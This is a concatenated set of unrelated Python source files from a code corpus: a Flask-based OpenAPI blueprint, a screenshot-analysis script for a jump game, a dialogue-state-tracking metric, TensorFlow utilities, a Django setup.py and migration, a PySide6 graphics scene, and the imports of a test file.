class Blueprint(
        FlaskBlueprint,
        ArgumentsMixin, ResponseMixin, PaginationMixin, EtagMixin):
    """Blueprint that registers info in API documentation"""

    # Order in which the methods are presented in the spec
    HTTP_METHODS = ['OPTIONS', 'HEAD', 'GET', 'POST', 'PUT', 'PATCH', 'DELETE']

    # Default request-body content type for each argument location ("in").
    DEFAULT_LOCATION_CONTENT_TYPE_MAPPING = {
        "json": "application/json",
        "form": "application/x-www-form-urlencoded",
        "files": "multipart/form-data",
    }

    # Delimiter separating the docstring part used for docs from the rest.
    DOCSTRING_INFO_DELIMITER = "---"

    def __init__(self, *args, **kwargs):
        # Blueprint-level description shown in the generated documentation.
        self.description = kwargs.pop('description', '')
        super().__init__(*args, **kwargs)
        # _[manual|auto]_docs are ordered dicts storing endpoints documentation
        # {
        #     endpoint: {
        #         'get': documentation,
        #         'post': documentation,
        #         ...
        #     },
        #     ...
        # }
        self._auto_docs = OrderedDict()
        self._manual_docs = OrderedDict()
        # Endpoint names registered so far; used by ``route`` to detect and
        # silently resolve endpoint-name collisions.
        self._endpoints = []

    def route(self, rule, *, parameters=None, **options):
        """Decorator to register url rule in application

        Also stores doc info for later registration

        Use this to decorate a :class:`MethodView <flask.views.MethodView>` or
        a resource function.

        :param str rule: URL rule as string.
        :param str endpoint: Endpoint for the registered URL rule (defaults
            to function name).
        :param list parameters: List of parameters relevant to all operations
            in this path, only used to document the resource.
        :param dict options: Options to be forwarded to the underlying
            :class:`werkzeug.routing.Rule <Rule>` object.
        """
        def decorator(func):
            # By default, endpoint name is function name
            endpoint = options.pop('endpoint', func.__name__)
            # Prevent registering several times the same endpoint
            # by silently renaming the endpoint in case of collision
            if endpoint in self._endpoints:
                endpoint = '{}_{}'.format(endpoint, len(self._endpoints))
            self._endpoints.append(endpoint)
            # MethodView classes must be converted to a view function.
            if isinstance(func, MethodViewType):
                view_func = func.as_view(endpoint)
            else:
                view_func = func
            # Add URL rule in Flask and store endpoint documentation
            self.add_url_rule(rule, endpoint, view_func, **options)
            self._store_endpoint_docs(endpoint, func, parameters, **options)
            return func
        return decorator

    def _store_endpoint_docs(self, endpoint, obj, parameters, **options):
        """Store view or function doc info"""
        endpoint_auto_doc = self._auto_docs.setdefault(
            endpoint, OrderedDict())
        endpoint_manual_doc = self._manual_docs.setdefault(
            endpoint, OrderedDict())

        def store_method_docs(method, function):
            """Add auto and manual doc to table for later registration"""
            # Get auto documentation from decorators
            # and summary/description from docstring
            # Get manual documentation from @doc decorator
            auto_doc = getattr(function, '_apidoc', {})
            auto_doc.update(
                load_info_from_docstring(
                    function.__doc__,
                    delimiter=self.DOCSTRING_INFO_DELIMITER
                )
            )
            manual_doc = getattr(function, '_api_manual_doc', {})
            # Store function auto and manual docs for later registration
            method_l = method.lower()
            endpoint_auto_doc[method_l] = auto_doc
            endpoint_manual_doc[method_l] = manual_doc

        # MethodView (class)
        if isinstance(obj, MethodViewType):
            for method in self.HTTP_METHODS:
                if method in obj.methods:
                    func = getattr(obj, method.lower())
                    store_method_docs(method, func)
        # Function
        else:
            methods = options.pop('methods', None) or ['GET']
            for method in methods:
                store_method_docs(method, obj)
        # Path-level parameters apply to every operation on the endpoint.
        endpoint_auto_doc['parameters'] = parameters

    def register_views_in_doc(self, app, spec):
        """Register views information in documentation

        If a schema in a parameter or a response appears in the spec
        `schemas` section, it is replaced by a reference in the parameter or
        response documentation:

        "schema":{"$ref": "#/components/schemas/MySchema"}
        """
        # This method uses the documentation information associated with each
        # endpoint in self._[auto|manual]_docs to provide documentation for
        # corresponding route to the spec object.
        # Deepcopy to avoid mutating the source
        # Allows registering blueprint multiple times (e.g. when creating
        # multiple apps during tests)
        auto_docs = deepcopy(self._auto_docs)
        for endpoint, endpoint_auto_doc in auto_docs.items():
            parameters = endpoint_auto_doc.pop('parameters')
            doc = OrderedDict()
            for method_l, endpoint_doc in endpoint_auto_doc.items():
                # Format operations documentation in OpenAPI structure
                self._prepare_doc(endpoint_doc, spec.openapi_version)
                # Tag all operations with Blueprint name
                endpoint_doc['tags'] = [self.name]
                # Merge auto_doc and manual_doc into doc
                manual_doc = self._manual_docs[endpoint][method_l]
                doc[method_l] = deepupdate(endpoint_doc, manual_doc)
            # Thanks to self.route, there can only be one rule per endpoint
            full_endpoint = '.'.join((self.name, endpoint))
            rule = next(app.url_map.iter_rules(full_endpoint))
            spec.path(rule=rule, operations=doc, parameters=parameters)

    def _prepare_doc(self, operation, openapi_version):
        """Format operation documentation in OpenAPI structure

        The decorators store all documentation information in a dict structure
        that is close to OpenAPI doc structure, so this information could
        _almost_ be copied as is. Yet, some adjustemnts may have to be
        performed, especially if the spec structure differs between OpenAPI
        versions: the OpenAPI version is not known when the decorators are
        applied but only at registration time when this method is called.
        """
        # OAS 2
        if openapi_version.major < 3:
            if 'responses' in operation:
                for resp in operation['responses'].values():
                    # OAS 2 uses an "examples" map keyed by content type.
                    if 'example' in resp:
                        resp['examples'] = {
                            DEFAULT_RESPONSE_CONTENT_TYPE: resp.pop('example')}
            if 'parameters' in operation:
                for param in operation['parameters']:
                    if param['in'] in (
                            self.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING
                    ):
                        content_type = (
                            param.pop('content_type', None) or
                            self.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING[
                                param['in']]
                        )
                        if content_type != DEFAULT_REQUEST_BODY_CONTENT_TYPE:
                            operation['consumes'] = [content_type, ]
                        # body and formData are mutually exclusive
                        break
        # OAS 3
        else:
            if 'responses' in operation:
                for resp in operation['responses'].values():
                    # OAS 3 nests schema/example(s) under "content".
                    for field in ('schema', 'example', 'examples'):
                        if field in resp:
                            (
                                resp
                                .setdefault('content', {})
                                .setdefault(DEFAULT_RESPONSE_CONTENT_TYPE, {})
                                [field]
                            ) = resp.pop(field)
            if 'parameters' in operation:
                for param in operation['parameters']:
                    if param['in'] in (
                            self.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING
                    ):
                        # Body-like parameters become an OAS 3 requestBody.
                        request_body = {
                            x: param[x]
                            for x in ('description', 'required')
                            if x in param
                        }
                        fields = {
                            x: param.pop(x)
                            for x in ('schema', 'example', 'examples')
                            if x in param
                        }
                        content_type = (
                            param.pop('content_type', None) or
                            self.DEFAULT_LOCATION_CONTENT_TYPE_MAPPING[
                                param['in']]
                        )
                        request_body['content'] = {content_type: fields}
                        operation['requestBody'] = request_body
                        # There can be only one requestBody
                        operation['parameters'].remove(param)
                        if not operation['parameters']:
                            del operation['parameters']
                        break

    @staticmethod
    def doc(**kwargs):
        """Decorator adding description attributes to a view function

        Values passed as kwargs are copied verbatim in the docs

        Example: ::

            @blp.doc(description="Return pets based on ID",
                     summary="Find pets by ID"
            )
            def get(...):
                ...
        """
        def decorator(func):

            @wraps(func)
            def wrapper(*f_args, **f_kwargs):
                return func(*f_args, **f_kwargs)

            # Don't merge manual doc with auto-documentation right now.
            # Store it in a separate attribute to merge it later.
            # The deepcopy avoids modifying the wrapped function doc
            wrapper._api_manual_doc = deepupdate(
                deepcopy(getattr(wrapper, '_api_manual_doc', {})), kwargs)
            return wrapper

        return decorator
| StarcoderdataPython |
1972365 | <reponame>qianhk/FeiPython
#!/usr/bin/env python3
# coding=utf-8
from PIL import Image, ImageDraw
import os
import time
import math
# Vertical offset below the in-game score display; pixel scanning starts here.
under_game_score_y = 200
# Half the height of the piece's base, in pixels (used to find its center).
piece_base_height_1_2 = 13
# Approximate piece body width; used to mask the piece out of board scans.
piece_body_width = 49
def find_piece_and_board(im):
    """Locate the game piece and the next target board in screenshot *im*.

    Returns ``(piece_x, piece_y, board_x, board_y)`` in pixels, or
    ``(0, 0, 0, 0)`` if either cannot be detected.
    """
    w, h = im.size
    print("size: {}, {}".format(w, h))

    piece_x_sum = piece_x_c = piece_y_max = 0
    board_x = board_y = 0
    scan_x_border = int(w / 8)  # left/right margin ignored when scanning for the piece
    scan_start_y = 0  # starting y coordinate of the scan
    im_pixel = im.load()

    # Probe for scan_start_y in 50 px steps: the first row below the score
    # that is not a solid color marks (roughly) where the scene begins.
    for i in range(under_game_score_y, h, 50):
        last_pixel = im_pixel[0, i]
        for j in range(1, w):
            pixel = im_pixel[j, i]
            # Row is not a solid-color line: record scan_start_y and bail out.
            if pixel != last_pixel:
                scan_start_y = i - 50
                break
        if scan_start_y:
            break
    print("scan_start_y: ", scan_start_y)

    # Scan downward from scan_start_y; the piece should be in the upper part
    # of the screen, tentatively assumed not to be below 2/3 of the height.
    for i in range(scan_start_y, int(h * 2 / 3)):
        # Skipping the side borders also reduces the scanning cost.
        for j in range(scan_x_border, w - scan_x_border):
            pixel = im_pixel[j, i]
            # Match the color of the piece's bottom row; the piece position
            # is the average of the matching points on its lowest row. The
            # hard-coded color range should be OK for now.
            if (50 < pixel[0] < 60) \
                    and (53 < pixel[1] < 63) \
                    and (95 < pixel[2] < 110):
                piece_x_sum += j
                piece_x_c += 1
                piece_y_max = max(i, piece_y_max)
                im.putpixel([j, i], (255, 0, 0))

    if not all((piece_x_sum, piece_x_c)):
        return 0, 0, 0, 0
    piece_x = piece_x_sum / piece_x_c
    piece_y = piece_y_max - piece_base_height_1_2  # move up by half the piece base height

    # Scan the middle third of the screen for the next board: the first row
    # containing pixels that differ from the background reveals its top edge.
    for i in range(int(h / 3), int(h * 2 / 3)):
        last_pixel = im_pixel[0, i]
        if board_x or board_y:
            break
        board_x_sum = 0
        board_x_c = 0

        for j in range(w):
            pixel = im_pixel[j, i]
            # Skip columns near the piece, fixing the bug where the piece's
            # head is taller than the next (small) board.
            if abs(j - piece_x) < piece_body_width:
                continue

            # Fix a small bug caused by a thin line at the board's dome top;
            # this color-difference threshold should be OK for now.
            if abs(pixel[0] - last_pixel[0]) \
                    + abs(pixel[1] - last_pixel[1]) \
                    + abs(pixel[2] - last_pixel[2]) > 10:
                board_x_sum += j
                board_x_c += 1

        if board_x_sum:
            board_x = board_x_sum / board_x_c
            # Project from the board's top edge to its center using the actual
            # viewing angle: 30 degrees, i.e. tan(30) = sqrt(3) / 3.
            board_y = piece_y - abs(board_x - piece_x) * math.sqrt(3) / 3

    if not all((board_x, board_y)):
        return 0, 0, 0, 0

    return piece_x, piece_y, board_x, board_y
def save_debug_screenshot(oriFileName, im, piece_x, piece_y, board_x, board_y):
    """Save *im* next to the original screenshot, with a ``_debug`` suffix.

    The piece/board coordinates are accepted for signature compatibility;
    the overlay drawing that used them is currently disabled (see history).
    """
    base, ext = os.path.splitext(oriFileName)
    im.save('{}_debug{}'.format(base, ext))
def main():
    """Find the piece and the target board in a screenshot, then save a debug copy."""
    source_path = "./jump_1.png"
    screenshot = Image.open(source_path)
    # Locate the piece and the next board.
    piece_x, piece_y, board_x, board_y = find_piece_and_board(screenshot)
    timestamp = int(time.time())
    print(timestamp, piece_x, piece_y, board_x, board_y)
    if piece_x == 0:
        # Detection failed; nothing to annotate.
        return
    save_debug_screenshot(source_path, screenshot, piece_x, piece_y, board_x, board_y)


if __name__ == '__main__':
    main()
| StarcoderdataPython |
5184448 | from dataset_walker import DatasetWalker
import sys
import json
import argparse
# The fixed MultiWOZ-style slot inventory that every instance is scored over.
slot_keys = [
    ("restaurant", "book", "people"),
    ("restaurant", "book", "day"),
    ("restaurant", "book", "time"),
    ("restaurant", "semi", "food"),
    ("restaurant", "semi", "pricerange"),
    ("restaurant", "semi", "name"),
    ("restaurant", "semi", "area"),
    ("hotel", "book", "people"),
    ("hotel", "book", "rooms"),
    ("hotel", "book", "day"),
    ("hotel", "book", "stay"),
    ("hotel", "semi", "name"),
    ("hotel", "semi", "area"),
    ("hotel", "semi", "pricerange"),
    ("hotel", "semi", "stars"),
    ("hotel", "semi", "type"),
    ("attraction", "semi", "type"),
    ("attraction", "semi", "name"),
    ("attraction", "semi", "area")
]

# Spelled-out digits are normalized to numerals before value comparison.
normalize_dict = {"one": "1", "two": "2", "three": "3", "four": "4", "five": "5", "six": "6",
                  "seven": "7", "eight": "8", "nine": "9"}


class Metric:
    """Accumulates dialogue-state-tracking scores over a stream of instances.

    Call ``update(ref_obj, pred_obj)`` once per instance (both are nested
    ``{domain: {section: {slot: [values]}}}`` dicts), then ``scores()`` for
    joint goal accuracy plus slot-level precision/recall/F1.
    """

    def __init__(self):
        self.reset()

    def reset(self):
        """Zero every accumulator."""
        self._total_num_instances = 0.0
        self._joint_goal_matched = 0.0
        self._total_num_slots = 0.0
        self._num_slots_matched = 0.0
        self._ref_slots_with_values = 0.0
        self._ref_slots_with_none = 0.0
        self._pred_slots_with_values = 0.0
        self._pred_slots_with_none = 0.0
        self._value_match_score = 0.0
        self._none_match_score = 0.0

    def _normalize_value(self, value):
        """Lower-case *value* and map spelled-out digits to numerals."""
        normalized = value.lower()
        return normalize_dict.get(normalized, normalized)

    def _match_value(self, ref, pred):
        """Return True when the two values are equal after normalization."""
        # Original spelled this as an if/else assigning True/False; the
        # comparison itself already yields the boolean.
        return self._normalize_value(ref) == self._normalize_value(pred)

    @staticmethod
    def _slot_values(obj, key1, key2, key3):
        """Return the deduplicated value list at obj[key1][key2][key3], or None."""
        if key1 in obj and key2 in obj[key1] and key3 in obj[key1][key2]:
            return list(set(obj[key1][key2][key3]))
        return None

    def update(self, ref_obj, pred_obj):
        """Score one instance's predicted state against the reference state."""
        joint_goal_flag = True
        for key1, key2, key3 in slot_keys:
            self._total_num_slots += 1
            ref_val = self._slot_values(ref_obj, key1, key2, key3)
            pred_val = self._slot_values(pred_obj, key1, key2, key3)
            if ref_val is None and pred_val is None:
                # Both agree the slot is unfilled.
                self._ref_slots_with_none += 1
                self._pred_slots_with_none += 1
                self._none_match_score += 1
                self._num_slots_matched += 1
            elif ref_val is None:
                # False positive: prediction filled a slot the reference left empty.
                self._ref_slots_with_none += 1
                self._pred_slots_with_values += 1
                joint_goal_flag = False
            elif pred_val is None:
                # Missed slot: reference filled, prediction empty.
                self._ref_slots_with_values += 1
                self._pred_slots_with_none += 1
                joint_goal_flag = False
            else:
                # Both filled: compare value sets via an F1 over matched values.
                self._ref_slots_with_values += 1
                self._pred_slots_with_values += 1
                num_matched_values = 0.0
                for r in ref_val:
                    for p in pred_val:
                        if self._match_value(r, p):
                            num_matched_values += 1
                if num_matched_values > 0.0:
                    prec_values = num_matched_values / len(pred_val)
                    rec_values = num_matched_values / len(ref_val)
                    f1_values = 2 * prec_values * rec_values / (prec_values + rec_values)
                else:
                    f1_values = 0.0
                self._value_match_score += f1_values
                if f1_values == 1.0:
                    self._num_slots_matched += 1
                else:
                    joint_goal_flag = False
        if joint_goal_flag is True:
            self._joint_goal_matched += 1
        self._total_num_instances += 1

    @staticmethod
    def _prf(score, num_pred, num_ref):
        """Precision/recall/F1 with zero-safe denominators."""
        p = score / num_pred if num_pred > 0 else 0.0
        r = score / num_ref if num_ref > 0 else 0.0
        f = 2 * p * r / (p + r) if (p + r) > 0.0 else 0.0
        return p, r, f

    def scores(self):
        """Return the aggregate metric dict (JGA plus slot-level P/R/F1)."""
        jga = self._joint_goal_matched / self._total_num_instances
        slot_accuracy = self._num_slots_matched / self._total_num_slots
        slot_value_p, slot_value_r, slot_value_f = self._prf(
            self._value_match_score,
            self._pred_slots_with_values,
            self._ref_slots_with_values)
        slot_none_p, slot_none_r, slot_none_f = self._prf(
            self._none_match_score,
            self._pred_slots_with_none,
            self._ref_slots_with_none)
        scores = {
            'joint_goal_accuracy': jga,
            'slot': {
                'accuracy': slot_accuracy,
                'value_prediction': {
                    'prec': slot_value_p,
                    'rec': slot_value_r,
                    'f1': slot_value_f
                },
                'none_prediction': {
                    'prec': slot_none_p,
                    'rec': slot_none_r,
                    'f1': slot_none_f
                }
            }
        }
        return scores
def main(argv):
    """CLI entry point: score a predictions file against the labelled dataset."""
    arg_parser = argparse.ArgumentParser(description='Evaluate the system outputs.')
    arg_parser.add_argument('--dataset', dest='dataset', action='store', metavar='DATASET',
                            choices=['train', 'val', 'test'], required=True,
                            help='The dataset to analyze')
    arg_parser.add_argument('--dataroot', dest='dataroot', action='store', metavar='PATH', required=True,
                            help='Will look for corpus in <dataroot>/<dataset>/...')
    arg_parser.add_argument('--outfile', dest='outfile', action='store', metavar='JSON_FILE', required=True,
                            help='File containing output JSON')
    arg_parser.add_argument('--scorefile', dest='scorefile', action='store', metavar='JSON_FILE', required=True,
                            help='File containing scores')
    args = arg_parser.parse_args()

    with open(args.outfile, 'r') as prediction_file:
        predictions = json.load(prediction_file)

    walker = DatasetWalker(dataroot=args.dataroot, dataset=args.dataset, labels=True)
    metric = Metric()
    for (instance, ref), pred in zip(walker, predictions):
        metric.update(ref, pred)

    with open(args.scorefile, 'w') as score_file:
        json.dump(metric.scores(), score_file, indent=2)


if __name__ == "__main__":
    main(sys.argv)
| StarcoderdataPython |
3581555 | import os
import tensorflow as tf
from tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file
def jaccard_distance(text1, text2):
    """Measure the Jaccard distance between two texts.

    Args:
        text1, text2: iterables of hashable tokens.

    Returns:
        float in [0, 1]: 0.0 for identical token sets, 1.0 for disjoint sets.
        Two empty inputs are treated as identical and return 0.0 (the
        original raised ZeroDivisionError on an empty union).
    """
    set1, set2 = set(text1), set(text2)
    union = set1 | set2
    if not union:
        return 0.0
    return 1 - len(set1 & set2) / len(union)
def load_ckpt(args, saver, sess, ckpt_dir='train', ckpt_id=None):
    """Restore the latest checkpoint under <args.model_path>/<ckpt_dir> into *sess*.

    Args:
        args: config object providing ``model_path``.
        saver: tf.train.Saver used to restore the variables.
        sess: active TensorFlow session.
        ckpt_dir: sub-directory holding the checkpoints.
        ckpt_id: checkpoint selector; only None / -1 ("use latest") is handled here.

    Returns:
        The path of the restored checkpoint.
    """
    # NOTE(review): the loop body returns on its first pass, so this
    # ``while True`` never actually repeats — presumably a leftover retry
    # wrapper; confirm before removing.
    while True:
        if ckpt_id is None or ckpt_id == -1:
            ckpt_dir = os.path.join(args.model_path, ckpt_dir)
        ckpt_state = tf.train.get_checkpoint_state(ckpt_dir, latest_filename=None)
        print(ckpt_dir)
        ckpt_path = ckpt_state.model_checkpoint_path
        print("CKPT_PATH: {}".format(ckpt_path))
        # print_tensors_in_checkpoint_file(file_name=ckpt_path, tensor_name='', all_tensors=False)
        saver.restore(sess, ckpt_path)
        return ckpt_path
def gpu_config():
    """Return a tf.ConfigProto with soft device placement and lazy GPU memory growth."""
    session_config = tf.ConfigProto(allow_soft_placement=True)
    session_config.gpu_options.allow_growth = True
    return session_config
def assign_specific_gpu(gpu_nums='-1'):
    """Pin CUDA to the given comma-separated GPU indices (e.g. "0" or "0,1").

    A real selection must be supplied; the placeholder default '-1' (or None)
    is rejected.
    """
    assert gpu_nums not in (None, '-1')
    os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
    os.environ['CUDA_VISIBLE_DEVICES'] = gpu_nums
class Vocab():
    """Token <-> id lookup table backed by a one-token-per-line vocabulary file."""

    def __init__(self, path='data/vocab.txt'):
        self.word2id, self.id2word = {}, {}
        self.vocabpath = path
        self.read_voca()

    def read_voca(self):
        """Populate the lookup tables from the vocabulary file."""
        assert os.path.exists(self.vocabpath)
        with open(self.vocabpath, 'r', encoding='utf8') as vocab_file:
            tokens = [line.strip() for line in vocab_file.readlines()]
        for index, token in enumerate(tokens):
            self.word2id[token] = index
            self.id2word[index] = token
        # Cache the ids of the special markers for fast access.
        self.unk_id = self.word2id['<UNK>']
        self.beg_id = self.word2id['<BEG>']
        self.eos_id = self.word2id['<EOS>']
        self.pad_id = self.word2id['<PAD>']
        self.words = list(self.word2id.keys())
        self.word_sorted = tokens

    def text2ids(self, toks):
        """Map a list of token strings to ids, substituting <UNK> for unknown tokens."""
        assert isinstance(toks, list) and all(isinstance(tok, str) for tok in toks)
        return [self.word2id.get(tok, self.unk_id) for tok in toks]
def get_pretrain_weights(path):
    """Load pretrain weights and save.

    Opens the latest checkpoint in *path* inside a temporary session/graph
    and extracts every trainable variable's value.

    Returns:
        dict mapping variable name (e.g. "models/encoder/w:0") to its value
        as returned by ``sess.run``.
    """
    with tf.Session(config=gpu_config()) as sess:
        ckpt_name = tf.train.latest_checkpoint(path)
        meta_name = ckpt_name + '.meta'
        # Rebuild the saved graph from its .meta file, then restore values.
        save_graph = tf.train.import_meta_graph(meta_name)
        save_graph.restore(sess, ckpt_name)
        var_name_list = [var.name for var in tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES)]
        vardict = dict()
        for var in var_name_list:
            vardict[var] = sess.run(tf.get_default_graph().get_tensor_by_name(var))
    # Clear the imported graph so callers can build a fresh model afterwards.
    tf.reset_default_graph()
    return vardict
def print_config(args):
    """Print the key run-time configuration options for quick inspection."""
    for label, value in (('mode', args.mode),
                         ('model', args.model),
                         ('use pretrain', args.use_pretrain),
                         ('Batch size', args.batch_size)):
        print('{}: {}'.format(label, value))
def assign_pretrain_weights(pretrain_vardicts):
    """Build assign ops that copy pretrained values into the current graph.

    Args:
        pretrain_vardicts: dict of variable name -> value, as produced by
            ``get_pretrain_weights``.

    Returns:
        (assign_op, uninitialized_varlist): the tf.assign ops to run, and the
        variables for which no pretrained counterpart was found.

    Raises:
        ValueError: if an encoder/decoder kernel or bias has no pretrained
            match — those are expected to always be pretrained.
    """
    assign_op, uninitialized_varlist = [], []
    all_variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
    assign_op_names = []
    for var in all_variables:
        varname = var.name
        new_model_var = tf.get_default_graph().get_tensor_by_name(varname)
        # The backward model reuses weights saved under the "models" scope.
        if 'bw_model' in varname: varname = varname.replace('bw_model', 'models')
        if varname in pretrain_vardicts:
            assign_op.append(tf.assign(new_model_var, pretrain_vardicts[varname]))
            assign_op_names.append(varname)
        else:
            # Map renamed scopes back onto their pretrained counterparts.
            if varname.replace('models/decoder/attention_decoder', 'models/decoder/rnn') in pretrain_vardicts:
                corres_varname = varname.replace('models/decoder/attention_decoder', 'models/decoder/rnn')
                assign_op.append(tf.assign(new_model_var, pretrain_vardicts[corres_varname]))
                assign_op_names.append(varname)
            elif varname.replace('models/tgt_encoder/', 'models/encoder/') in pretrain_vardicts:
                corres_varname = varname.replace('models/tgt_encoder/', 'models/encoder/')
                assign_op.append(tf.assign(new_model_var, pretrain_vardicts[corres_varname]))
                assign_op_names.append(varname)
            elif ('/encoder/' in varname or '/decoder/' in varname) and ('kernel:0' in varname or 'bias:0' in varname):
                raise ValueError("{} should be pretrained.".format(varname))
            else:
                uninitialized_varlist.append(var)
    return assign_op, uninitialized_varlist
def ids2tokens(ids, vocab):
    """Map ids back to word strings, dropping padding and end-of-sequence markers."""
    skipped = (vocab.pad_id, vocab.eos_id)
    return [vocab.id2word[token_id] for token_id in ids if token_id not in skipped]
def sample_gumbel(shape, eps=1e-10):
    """Sample from Gumbel(0, 1).

    Args:
        shape: shape of the tensor of samples to draw.
        eps: numerical-stability constant guarding both log() calls.

    Returns:
        A tensor of Gumbel(0, 1) samples, excluded from gradient computation.
    """
    U = tf.random_uniform(shape, minval=0.0, maxval=1.0)
    # Bug fix: tf.stop_gradient is functional and returns a new tensor; the
    # original discarded its result, making the call a no-op. Rebind U so the
    # noise is actually detached from the gradient tape.
    U = tf.stop_gradient(U)
    return -tf.log(-tf.log(U + eps) + eps)
def gumbel_softmax_sample(logits, temp):
    """ Draw a sample from the Gumbel-Softmax distribution"""
    # Adding Gumbel noise to the logits and applying a temperature-scaled
    # softmax gives a differentiable approximation of categorical sampling.
    y = logits + sample_gumbel(tf.shape(logits))
    return tf.nn.softmax(y / temp)
def gumbel_softmax(logits, temp, hard=False):
    """Sample from the Gumbel-Softmax distribution and optionally discretize.

    Args:
        logits: [batch_size, n_class] unnormalized log-probs
        temperature: non-negative scalar
        hard: if True, take argmax, but differentiate w.r.t. soft sample y

    Returns:
        [batch_size, n_class] sample from the Gumbel-Softmax distribution.
        If hard=True, then the returned sample will be one-hot, otherwise it will
        be a probability distribution that sums to 1 across classes
    """
    y = gumbel_softmax_sample(logits, temp)
    if hard:
        k = tf.shape(logits)[-1]
        #y_hard = tf.cast(tf.one_hot(tf.argmax(y,1),k), y.dtype)
        # Hard one-hot of each row's maximum (ties would yield multiple ones).
        y_hard = tf.cast(tf.equal(y, tf.reduce_max(y, 1, keep_dims=True)), y.dtype)
        # Straight-through estimator: forward pass is y_hard, gradients flow
        # through the soft sample y.
        y = tf.stop_gradient(y_hard - y) + y
    return y
| StarcoderdataPython |
12823540 | #!/usr/bin/env python
import os
from setuptools import setup, find_packages
# Package metadata, passed verbatim to setuptools.setup() below.
sdict = dict(
    name = 'django-govuk-template',
    packages = find_packages(),
    version = '0.16.0',
    description = 'Django packaged version of the GOV.UK template',
    long_description = 'A base template for Government Digital Services',
    url = 'https://github.com/alphagov/govuk_template',
    author = 'Government Digital Service developers (https://gds.blog.gov.uk/)',
    author_email = '<EMAIL>',
    maintainer = '<NAME>',
    maintainer_email = '<EMAIL>',
    keywords = ['python', 'django', 'alphagov', 'govuk'],
    license = 'MIT',
    include_package_data = True,
    install_requires = [
        'django>=1.3'
    ],
    platforms=["any"],
    classifiers=[
        'Programming Language :: Python',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Development Status :: 3 - Alpha',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ]
)

# Bug fix: the original re-imported setup from distutils.core right before
# this call, shadowing the setuptools version imported at the top of the
# file. distutils' setup() does not understand setuptools-only keywords such
# as install_requires and include_package_data, so they were silently
# dropped/warned about. Use the setuptools setup imported above.
setup(**sdict)
| StarcoderdataPython |
12819951 | <filename>dcs_kneeboard_creator/widgets/scene.py
import sys
import logging
# NOTE(review): configuring the root logger at import time is a side effect
# unusual for a library module; applications normally own basicConfig.
logging.basicConfig(level=logging.INFO)
from PySide6.QtWidgets import *
from PySide6.QtGui import *
from PySide6.QtCore import *
import ez_utils.general as utils
import ez_utils.io_utils as io_utils
from ..graphics.waypoint import Waypoint
class BoardScene(QGraphicsScene):
    """Fixed-size (768x1024) graphics scene holding the kneeboard items."""

    def __init__(self):
        super().__init__()
        self.setBackgroundBrush(QColor(20, 20, 20))
        self.setSceneRect(0, 0, 768, 1024)
        self.TEST_DELETEME()
        self.add_boundary()

    def TEST_DELETEME(self):
        """Temporary scaffolding: adds two movable rectangles and a waypoint."""
        test = QGraphicsRectItem(0, 0, 50, 60)
        test.setBrush(QBrush(QColor(255, 0, 255)))
        test.setFlag(QGraphicsRectItem.ItemIsSelectable)
        test.setFlag(QGraphicsRectItem.ItemIsMovable)
        test.setFlag(QGraphicsRectItem.ItemSendsGeometryChanges)

        test2 = QGraphicsRectItem(0, 60, 50, 60)
        test2.setBrush(QBrush(QColor(255, 0, 0)))
        test2.setFlag(QGraphicsRectItem.ItemIsSelectable)
        test2.setFlag(QGraphicsRectItem.ItemIsMovable)
        test2.setFlag(QGraphicsRectItem.ItemSendsGeometryChanges)

        self.addItem(test)
        self.addItem(test2)

        waypoint = Waypoint(200, 400)
        self.addItem(waypoint)

    def add_boundary(self):
        """Draw the page outline above all scene content."""
        self.boundary = QGraphicsRectItem(0, 0, 768, 1024)
        self.boundary.setPen(QPen(QColor(0, 0, 0)))
        self.boundary.setZValue(10000)  # keep the outline on top of everything
        self.addItem(self.boundary)

    def render_scene(self, out_path=r"D:/test_image.png"):
        """Render the scene to a PNG file.

        Args:
            out_path: destination file path; defaults to the previously
                hard-coded debug path for backward compatibility.
        """
        self.setSceneRect(0, 0, 768, 1024)
        image = QImage(self.sceneRect().size().toSize(), QImage.Format_ARGB32)
        image.fill(Qt.transparent)
        painter = QPainter(image)
        self.render(painter)
        # Bug fix: end the painter *before* saving. The original saved while
        # the QPainter was still active on the image, which can produce an
        # incomplete file.
        painter.end()
        image.save(out_path)

    def dragMoveEvent(self, event):
        # Accept drags so a future dropEvent (disabled below) can fire.
        event.accept()

    # def dropEvent(self, event):
    #     try:
    #         class_name = event.source().selectedItems()[0].file_name_no_ext
    #         module = event.source().selectedItems()[0].folder_name
    #
    #         x = event.scenePos().x()
    #         y = event.scenePos().y()
    #
    #         dropped_node = self.add_node_to_view(class_name, module, x, y)
    #     except Exception as err:
    #         utils.trace(err)

    def keyPressEvent(self, event):
        # Ctrl+R renders the scene to the default debug path.
        if event.key() == Qt.Key_R and event.modifiers() == Qt.ControlModifier:
            print("rendering")
            self.render_scene()
        # self.delete_nodes()
| StarcoderdataPython |
1870308 | # Generated by Django 3.0.4 on 2020-04-19 20:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Depends on the built-in auth app (for Group) and the previous
    # YourJobAidApi migration that added UserProfile.bio.
    dependencies = [
        ('auth', '0011_update_proxy_permissions'),
        ('YourJobAidApi', '0023_userprofile_bio'),
    ]

    operations = [
        # Add a non-nullable FK from UserProfile to auth.Group. Existing rows
        # are backfilled with Group pk=2; preserve_default=False means the
        # default is used only for that backfill, not kept on the field.
        migrations.AddField(
            model_name='userprofile',
            name='group',
            field=models.ForeignKey(default=2, on_delete=django.db.models.deletion.CASCADE, related_name='role', to='auth.Group'),
            preserve_default=False,
        ),
    ]
| StarcoderdataPython |
3373889 | ##############################################################################
# Copyright 2016-2021 Rigetti Computing
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import json
import time
from typing import Any, Dict
import httpx
from pytest_httpx import HTTPXMock, to_response
from qcs_api_client.client import QCSClientConfiguration
